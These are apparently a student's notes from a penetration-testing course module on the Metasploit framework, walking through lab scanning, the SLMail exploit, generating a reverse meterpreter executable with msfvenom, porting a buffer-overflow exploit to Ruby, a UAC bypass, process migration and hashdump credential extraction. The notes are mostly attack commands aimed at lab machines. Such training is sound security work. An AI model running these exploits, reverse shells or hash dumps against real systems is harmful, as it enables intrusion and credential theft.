Free MP3 Music Header Free MP3 Music Header Free MP3 Music Header
Chrome Strip
Chrome Strip


We have used Metasploit previously for this course in past modules, we've generated shellcode, calculated buffers, and translated assembly to OP code using utilities from this framework, so what exactly is it? As described by it's authors the metasploit framework is an advanced open sourced platform written in ruby for developing, testing and using exploit code.

Metasploit can be handy in almost any phase of a penetration test, from passive and active information gathering to vulnerability research and development all the way to client side attacks and post-exploitation techniques.

There are several user interfaces that we can use to operate the metsaploit framework. The most popular is the interactive console msfconsole.

MSF requires several services to be running that are not enabled at boot time in Kali Linux.

To start the required postgres and metasploit service dependencies we can simply start them as we would any other service.
#/etc/init.d/postgresql start
#/etc/init.d/metasploit start

Now that everything is setup, we can start exploring the various exploits, auxiliary modules, payloads and plugins that the metasploit framework has to offer us.

To start the msfconsole

The help command can get us started with the basic options msf has to offer.

METASPLOIT FRAMEWORK - Auxiliary modules

The metasploit framework contains hundreds of auxiliary modules which provide various functionality such as protocol enumeration, host discovering and more. These modules all follow a common syntax usage which makes them easy to explore and use. Let's try using some of these auxiliary modules and get a feel for the syntax needed to run the metasploit framework.

The "show auxiliary" command will display a long list of all the different auxiliary modules in the metasploit framework that can be used for various tasks such as information gathering, located under the 'gather' hierarchy, scnning and enumeration of various services located under the 'scanner' hierarchy, and so on.

#show auxiliary


I'll quickly search for snmp to get a list of all exploits and modules which contain this string.

#search snmp

I receive a list that includes some basic snmp discovery modules. So let's go ahead and use this module.

msf>use auxiliary/scanner/snmp/snmp_enum

And let's get more info about this module

Now we need to figure out how to use this auxiliary module.
#show options

Note that some parameters are required to be entered before this module can run. In this case we want to add the RHOSTS and THREADS for faster scanning.
msf>set RHOSTS
msf>set THREADS 10

With all required parameters set we can now run this module:

The scanner has now run and has enumerated machines with the snmp protocol enabled and configured for public access.


Lets use the SMB version scanner
msf>use auxiliary/scanner/smb/smb_version
msf>show options
msf>set RHOSTS
msf>set THREADS 10

So the SMB OS Discovery module ran and enumerated machines with open SMB ports.

In the event that we want to set the input parameters such as RHOSTS to global, we can use setg instead of set. eg:
msf>setg RHOSTS


msf>use auxiliary/scanner/http/webdav_scanner
msf>show options

If we used the setg options the THREADS and RHOSTS will be already set. Let's run the module.

This plugin has scanner our network and discovered machines with the WebDav service enabled.

Taking some time to review the various auxiliary modules that the metasploit framework has to offer is a recommended exercise.


If the metasploit and postgresql services are started ahead of time, the metasploit framework will log it's findings and information about discovered hosts in a convenient and accessible database. To display all discovered hosts up to this point, we can give the 'hosts' command from within msfconsole.


To further populate this database, we can use the db_nmap metasploit wrapper to scan hosts with nmap and have the scan output inserted in to the database.

msf>db_nmap --top-ports 20

Once the scan is done, we can query the database for machines with specific properties. For example we can look for all machines with port 443 open.

msf>services -p 443

You can search for all the modules effecting a particular platform using the built-in search functionality of msfconsole. For example, use

msf> search platform:"Windows XP SP3" type:exploit

should find all the modules effecting Windows XP SP3. Use other regular expression variations as well such as Windows XP Service Pack 3 etc to get an idea.

Using the database - check out the looting commands towards the end.

METASPLOIT FRAMEWORK - Metasploit Exploits

An example using SLMAIL exploit. In this example the payload is altered.

msf>search pop3
msf>use exploit /windows/pop3/seattlelab_pass
msf> set PAYLOAD windows/shell_reverse_tcp
msf>show options
msf>set ROST
msf>set LHOST
msf>set LPORT 443

METASPLOIT FRAMEWORK - Metasploit Payloads

Up to now, we have limited our payload use in metasploit to simple standard own reverse shell payloads.

Let's take some time to examine some additional payloads that the metasploit framework has to offer. One of the first distinctions which are mportant to make note of is between metasploit payload is between staged and non-stage shell code.

A non-staged payload is a payload that is sent in it's entirety as we have done up to this point.

A staged payload is usaully sent in 2 parts. The first is a small primary payload which usually instructs the victim to connect back to the attacker and accept a larger secondary payload and then executes it.


One of the most powerful tage payloads that the metasploit framework has to offer is the meterpreter payload. Meterpreter is a staged multifunction payload that can be dynamically extended at run time. In practise this means that the meterpreter shell provides more features and functionality than a reguler shell by having in built file uploads and downloads, keyloggers and so on. This additional functionality makes meterpreter the favourite and most commonly used payload in the metasploit framework.

Let's get a taste of the meterpreter payload by swapping out our non stage reverse shell to a reverse meterpreter connection in our slmail exploit.

msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>show options

We now have a meterpreter shell on the windows lab machine. The help command will provide a list of commands that the meterpreter paylod has to offer.


meterpreter>search -f *pass*.txt

METASPLOIT FRAMEWORK - Meterpreter in Action

Meterpreter simplifies many of the post exploitation processes such as uploading and downloading files. Let's try uploading and downloading netcat to the victim machine using the meterpreter upload function.

meterpreter>upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec\\Desktop

In much the same way we can also download files from the victm to our attacking box.

meterpreter>download c:\\Windows\\system32\calc.exe /tmp/calc.exe

To directly interact with a victim machines command prompt, we can simply type the shell command.


Te huge adcantage of spawning a shell from within meterpreter, is that for some reason our shell should die, we can simply spawn a new one from within the meterpreter session.

Let's look at some additional payloads that the metasploit framework has to offer us.

METASPLOIT FRAMEWORK - Additional Payloads

Metasploit offers us a huge variety of shellcode payloads. From payloads that connect to a victim machine using VNC to payloads which tunnel themselves out of an organisation using DNS querries. getting to know these variou payloads can help us significantly during a penetration test.

For example, the reverse meterpreter https payload is designed to encapsulate meterpreter communications within https requests allowing us to bypass most deep packet inspection filters.

Another nice example is the reverse_tcp_allports payload which attempts to connect back to our attacking machine on all ports which is useful in situations when we are not sure what egress firewall rules are in place.


The metasploit framework, not only has a wide range of available payloads, but can also output these various payloads in to various filetypes and formats such as asp, vbscript, java executable, windows dlls pe binaries and more.

Let's take a look at the msfveno utility and get a listing of paylaods available to us.

#msfvenom -l

This produces a really long list of all the different types of payloads that msfvenom can generate.

Let's use msfvenom to generate a windows reverse meterpreter https pe executable.

#msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 -f exe --platform windows -a x86 > /var/www/html/reverse_met_https.exe

Check the file is as expected:
#file /var/www/html/reverse_met_https.exe

Download this file now to the windows 7 lab machine.

Before running the executable on the windows machine we first need to setup a listener on our attacking box.

METASPLOIT FRAMEWORK - The Multihandler Module

The metasploit multihandler module can accept varous payloads and handle them correctly including single and multi staged payloads.


msf>use exploit/multi/handler
msf>set PAYLOAD windows/meterpreter/reverse_https
msf>show options
msf>set LHOST
msf>set LPORT 443

The handler/listener is now running.

Now we can run the PE on the windows machine that we created in the last module. Once executed, we have a meterpreter session:



Let's take a look at what it takes to port some of our exploits to the metasploit framework.

See exercise

#nc -nvlp 443

Execute the exploit:

In this example, the SLMAIL exploit is ported. For the exercise, I want to do the same for my crossfire exploit.

Create the required metasploit directory structure under the root directory so that we dont corrupt the metasploit CAD package.

#mkdir -p ~/.msf4/modules/exploits/windows/misc
Enter the directory.
#cd ~/.msf4/modules/exploits/windows/misc

Copy an existing SLMAIL exploit to this directory so that it can be used as a template.

cp /usr/share/metasploit-framework/modules/exploits/window/pop3/seattlelab_pass.rb ./vulnsever.rb

And proceed to edit the template that was just copied over.
#nano vulnserver.rb

Start by changing the name, description and author of the exploit.

Update the space for the ShellCode - 800 bytes
Update the return address to match the one that we used in our python code. - 0x65d11d71
Update the target description "Universal JMP ESP address"
Update the default RPORT to 5555

Now it is time to recreate our exploit buffer within this Ruby Exploit.
Remove the previous buffer setup for the slmail exploit.
For reference puposes, paste the buffer taken from the python exploit.

using the python buffer as a reference, recreate the buffer in ruby.

Example from the video:

This goes after
def exploit

My modified buffer goes here.

and before

request = "AUTH" + make_nops(40)
request << payload.encoded
request << make_nops(1000-payload.encoded.length)
request << [target.ret].pack('V')
request << "\x81\xC4\x54\xF2\xFF\xFF"
request << "\xe9\xf9\xfb\xff\xff"
request << rand_text_alpha(400)

Now we save and exit.

Proceed to load it within the metasploit framework.

msf>search vulnerserver
msf>use exploit/windows/misc/vulnerserver
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST
msf>set LPORT 443
msf>set RHOST

Make sure that the vulnerable server is running on the windows machine by running the shortcut in the tools directory.


We have a shell.


See exercise

#nc -nvlp 443

Execute the exploit


1. Create a new directory in metasploit.
2. Create a new file in this directory and copy in the contents of the example exploit in the pdf.
3. Test using this exploit as is.
3. Adjust the values to match what it is I have in my exploit
4. Test the exploit once more.

This is now working and the exploit is listed as crossfireSaidshow2.rb


So far we have seen file uploads and downloads along with simple session management however the metasploit framework has much more to offer in this field, from privilege escalation, dumping windows hashes, running keyloggers and even taking screenshots of the victim machine. But first before we get start its crucial to get a full understanding of the privileges we have on the system especially when working with windows OS.

Let's use a reverse meterpreter shell as an example.

While our shell may have been run by an admin user, we may still face restrictions such as UAC or require process migration for our post exploitation modules to work.

The getuid command shows that we have the privileges of the 'offsec' user. We already know that this user is an admin.


the getprivs command shows that the current shell has UAC restrictions imposed on it.


This means if we try and run a post exploitation module such as 'hashdump', the process may fail as I do not have the correct privileges to run this module. In this case I will first need to bypass UAC.

In order to bypass UAC, I need to background the current meterpreter session: meterpreter>background

Now invoke a metasploit module able to bypass UAC.

msf>use exploit/windows/local/bypassuac

msf>set SESSION 1

msf>set PAYLOAD windows/meterpreter/reverse_tcp

msf>set LHOST

msf>set LPORT 8888 (NOTE: This needs to be a port that is not already in use. Eg, a different port to the original session.)


This will upload a file and execute a new reverse shell with improved privileges. See with the getprivs command that there is now a much larger set of privileges.


Now that we have non UAC restricted admin shell, let's try hashdump once more


This fails once more. This module needs to run with system privileges.

To solve this problem we can try migrating the current meterpreter process to an existing process that is running with system privileges such as the SNMP service.

List all running processes and their privilege with the ps command.


Let's have meterpreter migrate to this process.

meterpreter>migrate 1468

A getuid command should now show that the meterpreter process is running with system privileges.


Hashdump now completes successfully.


background this second system privileged shell and list all sessions that we currently have:


msf>sessions -l